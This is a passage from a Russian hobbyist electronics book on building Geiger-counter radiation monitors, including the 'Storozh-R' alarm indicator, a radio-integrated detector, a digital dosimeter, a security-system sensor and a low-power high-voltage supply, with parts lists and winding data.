При сборке прибора рекомендуется использовать следующие типы конденсаторов: С1 - К73-9-630В, С2 - КД-26-500В, С8 и С9 - К10-17-26, С5 - К53-30 или К53-19; С7, С10 - К50-40 или К50-35.
При возможных заменах следует иметь в виду, что завышенные утечки конденсаторов С1 и С2 (как и обратный ток диодов VD1 и VD2) могут резко увеличить энергопотребление прибора. Оно может быть заметно увеличено и неудачным выбором конденсатора С5.
Резисторы: R1 - КИМ-0,125 или СЗ-14-0,125, остальные - МЛТ-0,125, С2-23-ОД25 или С2-33-ОД25.
В качестве DD1 можно, конечно, взять микросхему К561ЛА7. Диод КД510А - заменить любым кремниевым с током в импульсе не менее 0,5 А. Светодиод годится практически любой, критерий здесь - достаточная яркость.
Пьезоизлучатель барабанного типа ЗП-1 может быть заменен излучателем с акустическим резонатором - ЗП-12 или ЗП-22. Возможно применение и других пьезоизлучателей. Критерий здесь - достаточна громкость.
Полностью смонтированную печатную плату, пьезоизлучатель и выключатель устанавливают на передней панели прибора, которую изготавливают из ударопрочного полистирола толщиной 2,5 мм (рис. 69, б). Корпус прибора, имеющий форму открытой коробки, изготавливают из полистирола толщиной 1,5...2 мм; по краю, с внутренней его стороны выбирают паз глубиной 2,5 мм для фиксации в нем передней панели прибора по всему ее периметру. Крышку скрепляют с передней панелью винтом М2, место крепления - прилив на отсеке питания с запрессовыванным в нем металлическим вкладышем, имеющим резьбу под винт М2. Поскольку источник питания в приборе меняют очень редко, сдвижную крышку у отсека питания можно не делать.
Так как полистирол может вполне ощутимо ослабить ионизирующее излучение (см. приложения 6 и 7), в стенке корпуса, примыкающей к счетчику Гейгера, делают сквозной вырез, который можно перекрыть лишь редкой решеткой. Такими же решетками перекрывают и акустические вырезы в передней панели и в крышке прибора.
В «Стороже-Р» можно использовать не только счетчики Гейгера типа СБМ20. Годятся, без заметных изменений потребительских свойств и каких-либо переделок прибора, счетчики типа СТС5, СБМ32 и СБМ32К.
Но существуют счетчики Гейгера, способные значительно увеличить общую и спектральную чувствительность прибора. Например, СБТ7, СБТ9, СБТ10А, СБТ11, СИ8Б, СИ13Б, СИ14Б. Все они имеют тонкие слюдяные «окна» и обладают высокой чувствительностью не только к гамма- и жесткому бета-, но и к мягкому бета-излучению (а СБТ11 - и к альфа-излучению). Правда, их конфигурация потребует внесения существенных изменений в конструкцию корпуса прибора, в общую его компоновку. Для некоторых из них потребуется и коррекция порога тревожной сигнализации. Информация по счетчикам Гейгера отечественного производства, которые могут быть использованы в самодельных приборах радиационного контроля, приведена в приложении 4.
Ничто, кроме растущих габаритов и стоимости, не может помешать ставить в «Сторож-Р» и несколько счетчиков Гейгера (их включают параллельно) - для увеличения общей и спектральной чувствительности прибора.
Прибор не требует наладки - правильно собранный, он начинает работать сразу. Но есть в нем два резистора, номиналы которых потребуется, возможно, уточнить. Это резистор R5, с помощью которого частоту звукового генератора выводят на частоту механического резонанса пьезоизлучателя (их значительное несовпадние сказывается на громкости щелчка). И резистор R8, определяющий порог тревожной сигнализации (порог повышается при увеличении сопротивления R8). Коррекция порога может потребоваться не только при использовании счетчика, существенно отличающегося от СБМ20 радиационной чувствительностью, но и при перенастройке прибора для работы в условиях повышенного радиационного фона, в условиях, например, уже состоявшегося радиационного загрязнения местности.
«Сторож-Р» прост в обращении и не требует от владельца какой-либо специальной подготовки. Редкое пощелкивание акустических импульсов, следующих друг за другом без видимого порядка, отсутствие тревожной сигнализации (вспышек светодиода) говорят о том, что прибор находится в условиях естественного радиационного фона. Это фоновое пощелкивание почти не зависит от времени суток; сезона и местоположения прибора, несколько замедляясь лишь глубоко под землей и ускоряясь в высокогорье.
Увеличение скорости счета при перемещении прибора, а тем более появление тревожной сигнализации, с очень высокой вероятностью означает, что прибор входит в поле источника радиации искусственного происхождения. Рефлекторное стремление человека покинуть это место - совершенно уместная здесь реакция (удаление от источника - лучший вид радиационной защиты, удаление источника - лучшая дезактивация).
Но можно это сделать и чуть позже, предварительно установив местоположение источника, его связь с тем или иным видимым предметом. Поскольку «Сторож-Р» имеет максимальную чувствительность со стороны своего «окна» — выреза в стенке корпуса, примыкающей к счетчику Гейгера, эта процедура напоминает радиопеленгацию. Направление на источник может быть установлено и приближением к нему: источник находится в направлении, на котором скорость счета растет максимально быстро.
При поиске источников, имеющих значительно меньшие размеры, нежели сам счетчик Гейгера, рекомендуется проводить сканирование подозрительных мест: перемещать прибор, меняя направление его движения и ориентацию. Таким образом положение невидимой простым глазом «горячей» Частицы, например, определяется с точностью до 2...3 мм.
Однако все это может показаться недостаточным. Хотелось бы знать - опасно обнаруженное или нет. Внесем ясность: на этот вопрос не отвечают, не могут ответить и, возможно, не смогут это сделать никогда дозиметрические приборы любых типов. Рецепта отделения «опасного» от «безопасного» в сколько-нибудь сложных случаях - а взаимоотношения живого с радиоизотопами загрязнений относятся к наисложнейшим - может не быть вообще, во всяком случае - рецепта простого, реализацию которого можно было бы передоверить прибору.
Но и это - если «безопасная» радиация существует хотя бы в принципе. К сожалению, в многолетних поисках она так и не была обнаружена. Можно было говорить лишь о большем или меньшем ее вреде. И в цивилизованных странах от идеи существования подпороговой радиации - радиации, воздействие которой совершенно компенсировалось бы какими-то защитными механизмами организма, - отказались. Отказались давно, в США, например, в 1946 году.
Минимизация облучения человека - этическая норма в обращении с источниками ионизирующего излучения. К различным ведомственным нормам, принимающим в качестве допустимых уровни, значительно превышающие естественный радиационный фон, следует относиться как к попыткам найти баланс, взвесив на универсальных весах хозяйственника стоимость защитных мер - с одной стороны - и потери общества от радиационного поражения - с другой.
«Сторож-Р» отличается от большинства теперь уже многочисленных разновидностей бытовых дозиметрических приборов прежде всего тем, что практически полностью устраняет опасность случайного облучения своего владельца. Работая в непрерывном режиме, почти не мешая другим занятиям (любой фон, как признак стабильности ситуации, легко «уходит» в подсознание человека), он мгновенно обращает его внимание на сколько-нибудь заметное изменение радиационной обстановки (другая, столь же фундаментальная особенность нашего восприятия окружающего).
Особенно эффективен «Сторож-Р» в обнаружении компактных радиационных образований - начальной фазы почти любого радиационного загрязнения. К сожалению, в этой фазе своего существования (наиболее доступной, кстати, для дезактивации) они попадают в поле зрения служб радиационного контроля лишь в виде исключения: даже самая совершенная, но находящаяся в отдалении аппаратура физически не в состоянии обнаружить такого рода источники.
Порог тревожной сигнализации в приборе выставлен так, чтобы под ним оказался бы естественный радиационный фон с почти всеми возможными его отклонениями от среднего значения. Лишь очень немногие причины, не связанные с источниками радиации искусственного происхождения, могут вывести «Сторож-Р» в режим тревожной сигнализации**.
Но «Сторож-Р» может быть полезен и в условиях уже состоявшегося радиационного загрязнения местности. Выявление точечных источников и высокоактивных «пятен» на новом, техногенном фоне может оказаться делом даже более актуальным: опыт показывает, что радиационные загрязнения в таких местах отличаются чрезвычайной неравномерностью.
«Сторож-Р» - во многих своих прототипах и модификациях испытывался и находил применение в самых разных регионах нашей страны и за рубежом на протяжении последних сорока лет. С его помощью легко обнаруживались выброшенные «светящиеся» элементы старых приборов и радиоактивные ампулы пожарных датчиков, «горячие» частицы Чернобыля на предметах обихода и уже циркулирующие в кроветоке человека радиоактивные образования, высокоактивные минералы и окаменелости в музеях и коллекциях и продукты питания, миновавшие тройной (как утверждалось) казенный контроль, «освещающие» прохожих ускорители НИИ и радиоактивная «грязь» в медицинских учреждениях. И многое, многое другое...
Но куда чаще «Сторож-Р» снимал необоснованные страхи и подозрения - то, что с долей пренебрежения называют радиофобией, а на самом деле являющиеся нормальной реакцией человека на безличное, «среднестатистическое» к нему отношение.
*) Или, что то же, СБМ-20. В заводской маркировке дефис нередко отсутствует (это относится и к счетчикам других типов).
**) Среднее значение естественного радиационного фона на уровне моря близко к 15 мкР/ч. На высоте 1 км фон вырастает примерно вдвое, на высоте 10...12 км - в 10...15 раз. На земном шаре есть несколько мест с аномально высоким уровнем есте- ственного радиационного фона. В 2...4 раза он завышен в некоторых районах Франции, Бразилии, Индии, Египта и почти в 10 раз - на острове Ниуэ в Тихом океане. Причина таких аномалий - особенности местных геологических структур, их радионуклидный состав.
Радиационный индикатор в радиоприемнике
Транзисторный приемник с введенным в него радиационным детектором не только приобретает новую важную функцию, но объединение этих двух аппаратов имеет очевидные выгоды: корпус, источник питания, усилитель низкой частоты и акустический излучатель могут быть в таком «комбайне» общими.
Принципиальная схема радиационного блока, встраиваемого в транзисторный радиоприемник, показана на рис. 70. В его основе - радиационный индикатор «Сторож-Р» (см. в этой книге). Поскольку
Рис. 70. Принципиальная схема встраиваемого радиационного индикатора
Рис. 71. Печатная плата индикатора
различаются эти приборы лишь формой тревожного сигнала (вспышки светодиода там и тональные посылки здесь), то здесь уделим основное внимание возможной конструкции такого «комбайна», стыковке его составляющих.
Все элементы индикатора, за исключением переключателя SA1, монтируют на двусторонней печатной плате, «монтажная» сторона которой показана на рис. 71. Фольгу со стороны деталей используют лишь в качестве нулевой шины-«земли», в местах пропуска проводников в ней вытравлены кружки диаметром 1,5...2 мм, а места соединения с ней «заземляемых» проводников показаны черными квадратами. Высота устанавливаемых на плату деталей не должна превышать 8...9 мм. Счетчик Гейгера крепят на плате со стороны печатных проводников с помощью надетых внатяг на выводы анода и катода проволочных скоб, впаянных затем в предназначенные для них отверстия.
Полностью смонтированный радиационный блок (его габариты 19х23х109 мм, масса 22 г) можно установить в радиоприемник так, как это показано на рис. 72, а. В стенке корпуса делают сквозной вырез 11х109 мм для пропуска счетчика Гейгера. Во избежание возможного его повреждения (корпус счетчика очень тонок) на этот вырез наклеивают глубокую (-9 мм) накладку, имеющую форму продолговатой коробки с прорезями - окнами. Такое размещение радиационного блока возможно, если в радиоприемнике найдется свободное пространство 12х19х109 мм.
Вариант размещения, показанный на рис. 72, б, потребует большего пространства - 21х19х109 мм. Правда, габариты приемника в этом случае почти не изменятся: закрывающая вырез в корпусе (9х92 мм) защитная решетка может иметь толщину лишь 1,5...2 мм.
Рис. 72. Варианты размещения индикатора в радиоприемнике
Рис. 73. Радиационный индикатор в выносном блоке
Но если радиоприемник мал или «упакован» так, что установить в нем радиационный блок никак не удается*, то его можно поместить в отдельный футляр (рис. 73, а) и, связав с приемником тонким трехпроводным кабелем, носить так, как показано на рис. 73, б.
Выключатель питания SA1, которым к работающему приемнику подключают радиационный индикатор, можно установить в любом удобном для этого месте. Нередко в качестве выключателя удается использовать тот или иной коммутационный элемент самого приемника - например, свободную или не слишком нужную позицию переключателя диапазонов. Включенный индикатор никак не повлияет на работу приемника - на фоне принимаемой программы появятся лишь редкие (при нормальном радиационном фоне 15...25 имп/мин) акустические щелчки.
Радиационный индикатор рассчитан на установку в радиоприемники, имеющие 9-вольтное питание. Но его можно переделать и для работы в приемниках, питающихся от 6-вольтных батарей. Для этого потребуется лишь изменить моточные данные трансформатора Т1: обмотка II должна иметь 5, а обмотка III - 2 витка провода ПЭВШО-0,12.,.0,15. Обмотка I остается без изменений - все те же 420 витков ПЭВ-2-0,07.
Среди транзисторных приемников, особенно старых выпусков, могут оказаться модели, в которых с нулевой шиной-«землей» соединен не минус источника питания, а плюс. В таких случаях нужно лишь переполюсовать питание индикатора: соединить его «+» с «землей», а общий провод - с «-» радиоприемника.
Номинал резистора R6 выбирают в пределах (10...20)R, где R - сопротивление регулятора громкости радиоприемника.
Накладку или решетку, защищающую счетчик Гейгера от возможного повреждения, изготавливают из того же материала, что и корпус приемника. Если это ударопрочный полистирол (обычно это так), то для их склейки можно использовать распущенную в растворителе 647 стружку того же полистирола (того же цвета). Это по существу сварное соединение отличается высокой прочностью. Тем же клеем крепят к корпусу приемника и полистироловые стойки - опоры под печатную плату. Они должны иметь отверстия с резьбой под винт М2. Подходящие стойки, даже с залитыми в них металлическими вкладышами, нередко обнаруживаются в корпусах выброшенных электро- и радиоаппаратов самого разного назначения.
Трудности объединения этих двух аппаратов связаны, очевидно, с тем, что обычные бытовые транзисторные радиоприемники изначально на такое их применение не рассчитаны. Конечно, все элементы радиационного блока можно было бы разместить на общей с радиоприемником печатной плате, предусмотрев в его корпусе соответствующее «окно» для счетчика Гейгера.
Обратим внимание будущих конструкторов таких «комбайнов» на особенности УНЧ, противоречивость предъявляемых к нему здесь требований. С одной стороны, при работе с радиоприемником УНЧ должен иметь достаточно малые нелинейные искажения, а с другой - при работе лишь с радиационным индикатором - предельно малое, в паузе близкое к нулю, энергопотребление (ток, потребляемый самим индикатором, <0,2 мА). Энергоэкономичность режима радиационного контроля вовсе не самоцель - в сомнительных обстоятельствах радиационную обстановку контролируют непрерывно.
В заключение заметим, что описанный здесь радиационный индикатор сохранит свою главную функцию - функцию прибора, следящего за радиационной обстановкой, и без узла, формирующего тревожный сигнал. Поэтому при необходимости (отсутствии, например, микросхемы К176ЛП1) этот узел можно исключить (исключают микросхему DD2, диоды VD4 и VD5, резисторы R8...R13, конденсаторы С8 и С9, а вывод 10 элемента DD1.1 соединяют непосредственно с выводом 6 элемента DD1.3).
*) Радиационная чувствительность счетчика Гейгера зависит от его размеров (см. приложение 4). В стремлении непременно вписаться в габариты малоразмерного приемника мы могли бы воспользоваться и малоразмерным счетчиком Гейгера, тем же СБМ10 или СБМ21. Но значительное (в 6...10 раз) снижение радиационной чувствительности вряд ли было бы оправдано в приборе такого назначения.
Радиолюбительский дозиметр
Ионизирующая радиация опасна для человека в любых дозах. В небольших ее воздействие оказывается очень замаскированным - последствия могут проявиться спустя годы, десятилетия и даже в следующих поколениях (онкология, генетические повреждения и др.). С увеличением уровня облучения не только возрастает вероятность таких последствий, но в организме человека возникают нарушения, которые могут привести его к гибели в считанные дни, часы, а то и прямо «под лучом»*. Так что знать уровень радиации, иметь возможность хотя бы приблизительно оценить его представляется никак не лишним.
Обнаружив повышенный уровень ионизирующего излучения, естественно поинтересоваться его источником. Что это: тайно захороненные радиоактивные отходы? Ускоритель соседнего НИИ? Рентгеновский аппарат, «светящий» не туда? Изотопная «мина» просвещенного киллера? Выброшенный за ненадобностью пожарный датчик? Радиоактивный минерал? Кость динозавра?... Какова активность обнаруженного? Конфигурация его излучения?... Для ответов на все эти вопросы нужен прибор, способный в каких- то единицах измерять уровень ионизирующего излучения.
Принципиальная схема радиолюбительского дозиметра, ведущего измерения ионизирующего излучения в ЕРФ - в единицах естественного радиационного фона (Dф@15 мкР/ч), приведена на рис. 74**.
Датчиком радиации BD1 в дозиметре является счетчик Гейгера типа СБМ20, чувствительный к g- и жесткому b-излучению (см. приложение 4). Его реакция на естественный радиационный фон - импульсы тока, следующие без видимого порядка со средней скоростью Na=20...25 имп/мин***. Скорость счета в счетчиках Гейгера линейно связана с уровнем радиации.
Рис. 74. Радиолюбительский дозиметр
Так, на десятикратное увеличение ее уровня счетчик СБМ20 отреагирует десятикратным же увеличением скорости счета - до Nрад =200...250 имп/мин. Прямая пропорциональность преобразования Nрад <->Dрад начнет нарушаться лишь при очень значительных уровнях радиации, с появлением большого числа импульсов, разделенных слишком малым, за пределами разрешающей способности счетчика, временным интервалом. В паспорте счетчика обычно указывают Nmax - максимальную скорость счета. Для счетчика СБМ20 Nmax=4000 имп/с. И если он сохранит линейность преобразования Nрад <->Dрад хотя бы до 2000 имп/с, то по скорости счета можно будет численно оценивать радиационные поля в диапазоне Dрад =(1...5000) Dф - более чем достаточном для бытового прибора.
Рекомендуемое напряжение питания счетчика СБМ20 - Uпит=360...440 В. На этот диапазон напряжений приходится так называемое плато: изменения Uпит в этих пределах мало сказывается на скорости счета и принимать меры к его стабилизации нет необходимости. Во всяком случае - в приборах умеренной точности.
Устройство, преобразующее напряжение батареи, питающей дозиметр, в высокое напряжение Uпит на аноде счетчика Гейгера, построено на блокинг-генераторе (T1, VT1 и др.). На повышающей обмотке I его трансформатора формируется короткий - 5...10 мкс - импульс амплитудой 440...450 В, заряжающий через диоды VD1, VD2 конденсатор С1. Частота следования импульсов блокинг-генератора F@1/2R6·C3@40 Гц.
Каждая ионизирующая частица, возбуждающая счетчик Гейгера, становится причиной короткого лавинообразно развивающегося разряда. Возникающие на нагрузке счетчика, резисторе R1, импульсы напряжения поступают на одновибратор (DD10.3, DD10.4 и др.), формирующий из них «прямоугольные» импульсы длительностью tф1@R7·C7@0,2 мс и амплитудой, достаточной для управления КМОП-микросхемами. Все нужные в приборе временные интервалы и частоты формирует счетчик DD1. Его задающий генератор работает на частоте кварцевого резонатора ZQ1 - 32768 Гц.
Счетный узел дозиметра составлен из трех десятичных счетчиков DD4, DD5, DD6, люминесцентные индикаторы HG1, HG2 и HG3 которых индицируют, соответственно, «единицы», «десятки» и «сотни», и одного двоичного счетчика - DD7, представляющего «тысячи». Выходы десятичных счетчиков подключены к соответствующим сегментам люминесцентных индикаторов, а выходы счетчика DD7 - к децимальным точкам этих же индикаторов, на которых «тысячи» индицируются в двоичном коде: °°° - «0», °°* - «1», °*° - «2»,..., ** ° - «6», ***- «7» ( ° - точка «не горит», * - точка «горит»). Емкость счетного узла увеличивается таким образом до «7999».
Счетчик DD3 формирует единицу измерения, принятую в этом приборе. Если его датчик находится в условиях нормального радиационного фона, то на измерительном интервале tизм=39 с (это длительность «нуля» на выходе М счетчика DD1) на вход DD3 поступает в среднем Nф·39/60=(20...25)·39/60@16 импульсов. Т.е. в норме, при Nрад@Nф на табло счетчика будет зафиксировано: «000», если Nрад<16, или «001», если 16<Nрад<32 (время tизм выбрано так, чтобы флуктуации Nф практически никогда не достигали значения 2Nф ).
Измерительный интервал tизм завершается tинд - 3-секундной демонстрацией результата измерения. Ее формирует счетчик DD2. На время t блокируется вход счетного узла и включается устройство (VT3, VT4, Т2 и др.), преобразующее напряжение питания микросхем в значительно более низкое напряжение питания накалов люминесцентных индикаторов. Его форма - меандр, частота - 32768 Гц.
Интервал индикации tинд заканчивается переводом всех счетчиков прибора в нулевое состояние. И тут же начинается новый цикл измерения.
Прибор смонтирован на односторонней печатной плате размерами 123х88 мм, изготовленной из фольгированного стеклотекстолита толщиной 1,5 мм (рис. 75). На плате установлены все детали, кроме выключателя питания, звукоизлучателя и батареи «Корунд». Почти все резисторы в приборе - типа МЛТ-0,125 (R1 - КИМ-0,125). Конденсаторы: С1 - К73-9, С2 - КДУ или К2М (на напряжение не менее 500 В), СЗ, С4 и С5 - К53-1, остальные - КМ-6, К10-176 и др..
Трансформатор Tl наматывают на ферритовом кольце М3000МН К16х10х4,5, предварительно загладив его ребра наждачной бумагой и обмотав тонкой лавсановой или фторопластовой лентой. Первой наматывают обмотку I, содержащую 420 вит ков провода ПЭВ-2 0,07. Ее размещают почти по всему сердечнику, с промежутком 1,5...2 мм между началом и концом. Намотку ведут почти виток к витку, смещаясь по сердечнику лишь в одну сторону. Обмотку I также покрывают слоем изоляции. Обмотки II (8 витков) и III (3 витка) наматывают проводом ПЭВШО 0,15...0,25.
Рис. 75 Печатная плата дозиметра (масштаб 1:2)
Они должны быть распределены по сердечнику возможно равномернее. При монтаже трансформатора необходимо соблюдать фазировку его обмоток (их начала отмечены на схеме значком «•»). Экспериментировать с этим не следует - можно сжечь транзистор VT1.
Трансформатор Т2 наматывают на кольце К10х6х5 (феррит 2000НН). Его готовят к намотке так же, как и сердечник для трансформатора Т1. Обмотку I (400 витков) наматывают в два провода (ПЭВ-2 0,07). Конец одной полуобмотки соединяют с началом другой, так образуется средняя точка. Обмотка II содержит 17 витков провода ПЭВ-2 0,25...0,4.
Снаружи трансформаторы рекомендуется обмотать пластиковой изолентой - узкой полоской, вырезанной из липкой ПВХ. Это защитит их от неблагоприятных внешних воздействий. Крепят трансформаторы винтом МЗ (резьба в плате). Более простое, казалось бы, крепление трансформатора проволочной скобой таит в себе опасность: скоба может образовать в трансформаторе короткозамкнутый виток; нередкая, к сожалению, ошибка. Во избежание обрыва обмотки или замыкания ее витков крепление должно быть мягким, эластичным.
Плату монтируют на передней панели прибора (ударопрочный полистирол, дюралюминий и т.п.), в которой вырезано окно против люминесцентных индикаторов. Оно может быть закрыто зеленым фильтром. На ней же в вырезе нужного размера монтируют пъезоизлучатель ЗП-1 или ЗП-22. А под светодиод HL1 делают соответствующее его размерам отверстие.
Корпус прибора - стандартная пластмассовая коробка 130х95х20 мм (например, из-под шашек). Во избежание заметного уменьшения чувствительности прибора к мягкому ионизирующему излучению в стенке корпуса, примыкающей к счетчику Гейгера, нужно сделать вырез 10х65 мм, который затем можно перекрыть редкой решеткой.
Конечно, далеко не все из вышеперечисленного является строго обязательным. Резисторы типа МЛТ можно заменить на другие такого же размера. В качестве VT3, VT4 могут быть взяты практически любые n-p-n транзисторы. Если их усиление по току будет невелико, потребуется, возможно, несколько уменьшить сопротивление резисторов R9 и R10. Возможна и даже желательна замена люминесцентных индикаторов ИВ3 на ИВ3А, имеющие меньший ток накала.
Не является незаменимым и счетчик СБМ20. Пригодны любые 400-вольтные счетчики Гейгера, имеющие фоновую активность Nф@24 имп/мин. В этом случае в схему прибора не потребуется вносить никаких изменений. Если же Nф будет иным, то между выходами 1, 2, 4, 8 и 16 счетчика DD3 и входом счетчика-накопителя нужно включить диодно-резисторный дешифратор, в котором установкой соответствующих диодов должно быть набрано число, возможно более близкое к 0,65 Nф. На фрагменте схемы (рис. 76) показано, как это сделать для Nф=I6. Здесь 0,65 Nф@11, что в двоичном коде и набрано в дешифраторе. На печатной плате предусмотрено место для установки диодно-резисторного дешифратора.
Рис. 76. Дешифратор для коррекции Nф {Nф=16)
Возможен и другой путь: требуемое Nф может быть получено параллельным включением нескольких малочувствительных счетчиков Гейгера. Подойдет, например, «батарея» из пяти счетчиков СБМ10 или СБМ21.
Параметры наиболее подходящих для бытовых дозиметров счетчиков Гейгера приведены в приложении 4.
Таблица 12
Напряжение питания, В |
9,0 |
8,0 |
7,0 |
6,0 |
5,6 |
Скорость счета, ед. Nф |
35,8 |
34,2 |
34,0 |
32,8 |
32,8 |
Светодиод HL1, включающийся при переполнении счетчика-накопителя, т.е. при очень высоком уровне ионизирующего излучения, должен быть красным и возможно более ярким: АЛ307КМ, АЛ307ЛМ и др.
Параметры трансформатора Т1 выбраны так, что при разряде батареи питания напряжение на счетчике Гейгера остается в пределах плато счетной характеристики. Таблица 12 демонстрирует зависимость скорости счета от напряжении питания прибора при неизменной активности источника радиации.
В таблице 13 показана зависимость потребляемого прибором тока от напряжения источника питания.
Масса прибора с батареей «Корунд» - 225 г.
Табло счетчика-накопителя может быть выполнено и на жидко-кристаллических индикаторах. Принципиальная схема этого узла с табло типа ИЖЦ5-4/8 показана на рис. 77.
Поскольку в табло ИЖЦ5-4/8 четыре разряда, счетчик «тысяч» выполнен здесь аналогично предыдущим - на десятичном счетчике К176ИЕ4.
В дозиметре с ЖКИ не нужен, конечно, блок формирования напряжения накала. Поэтому элементы VT3, VT4, Т2, R9, R10 могут быть удалены, a DD9.1 и DD9.2 использованы по другому назначению (в противном случае их входы нужно соединить с «землей» или с «+» источника питания).
Таблица 13
Режим |
Потребляемый ток, мА, при напряжении питания, В |
|||
9.0 |
8,0 |
7,0 |
6,0 |
|
Счет при N@Nф. |
0,82 |
0,66 |
0,53 |
0,42 |
Счет при N@130Nф |
1,20 |
0,95 |
0,75 |
0,60 |
Индикация |
23,5 |
21,0 |
18,5 |
16,0 |
Рис. 77. ЖКИ табло для дозиметра
Счетчик DD7 может быть сохранен, но лишь для формирования сигнала тревоги: при появлении на табло «8000» - уровня радиации, в 8000 раз превышающего уровень естественного радиационного фона, - он включит тревожную звуковую и световую сигнализации.
Еще одна особенность ЖКИ - сигнал на его сегменте должен иметь форму меандра. Сегмент становится заметным (черным), если его меандр находится в противофазе с меандром подложки ЖКИ (выводы 1 и 34), и остается фоновым, не выделенным, если их фазы совпадают. Счетчик К176ИЕ4 формирует на своих выходах меандры «единичной» и «нулевой» фазы, если на его вход S (выв. 6) подан опорный меандр с частотой следования несколько десятков или сотен герц. Можно, например, подключить входы S всех четырех счетчиков к выходу F (частота 1024 Гц) счетчика QD1.
Энергоэкономичность дозиметра с жидкокристаллическим табло будет, конечно, значительно выше, нежели с люминесцентным.
*) Homo sapiens - один из самых чувствительных к ионизирующей радиации биологических видов. Летальная доза для человека - 600 рентген.
**) Естественный радиационный фон в качестве своего рода тест-генератора дает возможность прокалибровать бытовой дозиметрический прибор, в том числе и самодельный, не прибегая к помощи каких-либо служб. Эта нестрогая единица позволила в свое время легализовать самодельные дозиметрические приборы.
***) Некоторая часть N. должна быть отнесена к самому счетчику, в частности, к воздействию на него радиоизотопов, входящих непосредственно в его конструкцию. В хороших счетчиках Гейгера эта составляющая N. достаточно мала и в бытовых приборах обычно не учитывается.
Датчик радиации в охранной системе
Принципиальная схема датчика, непрерывно контролирующего радиационную обстановку в районе своего расположения, показана на рис. 78.
Транзистор VT1, импульсный трансформатор Т1 и др. составляют блокинг-генератор, импульсы с повышающей обмотки I которого через диоды VD1, VD2 заряжают конденсатор С1 до напряжения +360...440 В. Этот конденсатор - источник питания счетчика Гейгера BD1. Импульс напряжения, возникающий на аноде BD1 в момент его возбуждения ионизирующей частицей (см. осциллограмму), поступает на вход формирователя (DD1.1, DD1.2 и др.), преобразующего его в «прямоугольный» длительностью R6·C5@1 мс, и затем на вход С счетчика DD2.
Выходом датчика является выход «32» счетчика DD2, на котором сигнал 1 - признак радиационной опасности - возникнет лишь в том случае, если Nт - общее число импульсов, поступивших на С-вход счетчика за время Т, достигнет 32. Поскольку Nт зависит от Nф - средней скорости счета счетчика Гейгера в условиях естественного радиационного фона и DNф - его флуктуаций, возникающих из-за краткости измерений, то длительность измерительного интервала Т должна быть такой, чтобы вероятность появления Nт+DNт=32 в результате какого-либо измерения оказалась бы пренебрежимо малой (по характеру происходящих здесь процессов она не может быть равна нулю).
Рис. 78. Датчик радиации в охранной системе
Так, например, если в счетчике Гейгера, имеющего Nф=20 имп/мин (это устанавливают длительными измерениями), при экспозиции T=1 мин флуктуации DNт max=10, т.е. не выходят из пределов 10 имп/мин (это устанавливают в процессе измерения Nф), то Nт max=20+10<32 и такой датчик не поднимет ложной тревоги.
Может показаться, что измерения можно было бы легко ускорить. Взяв, например, Т=1/2 мин и сделав выходом датчика выход «16» счетчика DD2. Но если «постоянная составляющая» фона в таком случае уменьшится вдвое и составит Nф/2=10, то его флуктуации - лишь в Ц2 раз, до DNт max/Ц2 = 10/Ц2=7. В таком случае Nт max=10+7>16 и такой датчик будет время от времени подавать сигнал радиационной опасности без какого-либо на то основания. Со всеми вытекающими отсюда последствиями. Прежде всего - недоверием к нему.
В тех случаях, когда возникает необходимость зафиксировать и кратковременное появление источника радиации (перемещающегося,
Рис. 79. Генератор импульсов сброса к датчику радиации
например, в проходящем мимо автомобиле), берут счетчик Гейгера, обладающий большей радиационной чувствительностью, или используют несколько малочувствительных счетчиков, набрав нужную чувствительность их числом (счетчики Гейгера можно включать параллельно - при низких, фоновых скоростях счета их радиационные чувствительности суммируются).
В приложении 4 приведены основные параметры счетчиков Гейгера отечественного производства, среди которых можно подобрать наиболее подходящий для решения той или иной задачи.
Трансформатор Т1 может быть здесь таким же, как и в «Стороже-Р». Принципиальная схема генератора импульсов, задающих паузу Т на входе R счетчика DD2, показана на рис. 79, а. Хотя в этом, как правило, не возникает необходимости — почти всегда охранная система имеет электронные часы с многоразрядным делителем частоты и сформировать нужную последовательность коротких импульсов можно так, как показано на рис. 79, б.
Экономичный источник питания счетчика Гейгера
В автономных приборах непрерывного радиационного контроля, использующих в качестве датчиков радиации счетчики Гейгера, основным энергопотребителем является устройство, преобразующее невысокое напряжение источника питания прибора в напряжение 360...440 В, соответствующее плато счетной характеристики галогенового счетчика Гейгера (см. приложение 4). Принципиальная схема энергоэкономичного преобразователя напряжений показана на рис. 80.
Рис. 80. Экономичный источник питания счетчика Гейгера
Его основу составляет блокинг-генератор, на выходной обмотке которого формируются короткие (5...10 мкс) импульсы амплитудой около 420 В. Через диоды VD3, VD4 они заряжают конденсатор С4. Этот конденсатор и будет источником питания счетчика Гейгера (напомним, что проводимость счетчика Гейгера в паузе между возбуждениями близка к нулю).
Энергоэкономичность преобразователя обеспечивается тем, что межимпульсная пауза в его блокинг-генераторе задается не собственной времязадающей цепочкой R1C3, как это обычно делается, а одновибратором (DD1.1, DD1.2 и др.), работающим на микротоках [2]. Продолжительность паузы в нем tп@R3·C5 выбирают так, чтобы напряжение на выходе преобразователя в режиме фонового счета было близко к высшему значению напряжения на плато счетной характеристики счетчика Гейгера. (В дальнейшем снижение напряжения на выходе преобразователя, его смещение к другому краю плато будет обязано лишь снижению напряжения источника питания.)
Блокинг-генератор сформирует внеочередной импульс подпитки конденсатора С4, если на входе 2 элемента DD1.2 возникнет провоцирующий ее импульс. Если этот импульс будет возникать при каждом срабатывании счетчика Гейгера, то это позволит удержать напряжение на выходе преобразователя на уровне, не зависящем от скорости счета.
Трансформатор Т1 блокинг-генератора наматывают на ферритовом сердечнике, составленном из двух колец М3000МН 12х8х3 мм. Кольца склеивают, острые их ребра заглаживают наждачной бумагой и весь сердечник обматывают тонкой фторопластовой или лавсановой лентой.
Сначала наматывают обмотку II, она содержит 420 витков провода ПЭВ-2 0,07. Намотку ведут в одну сторону, почти виток к витку, оставляя между ее началом и концом «зазор» 1...1.5 мм. Обмотку II также покрывают слоем изоляции. Далее наматывают обмотку I - 5 витков провода ПЭВШО 0,15...0,2 - и по ней - обмотку III - 2 витка того же провода. Эти обмотки должны быть распределены по сердечнику возможно равномернее.
Правильная фазировка обмоток трансформатора (точками показаны их синфазные концы) должна быть соблюдена при его монтаже. Экспериментировать с этим не следует - можно сжечь транзистор.
В преобразователе: резисторы Rl, R2 - типа МЛТ-0,125, R3 - КИМ-0,125; конденсатор С1 - любой оксидный, С2, С5 - типа КМ-6 или К10-176, СЗ - К53-30, С4 - К73-9.
Преобразователи такой структуры закрывают, по существу, саму проблему питания счетчиков Гейгера от низковольтных источников: потребляемый таким преобразователем ток уже составляет малую часть тока саморазряда большинства гальванических батарей.
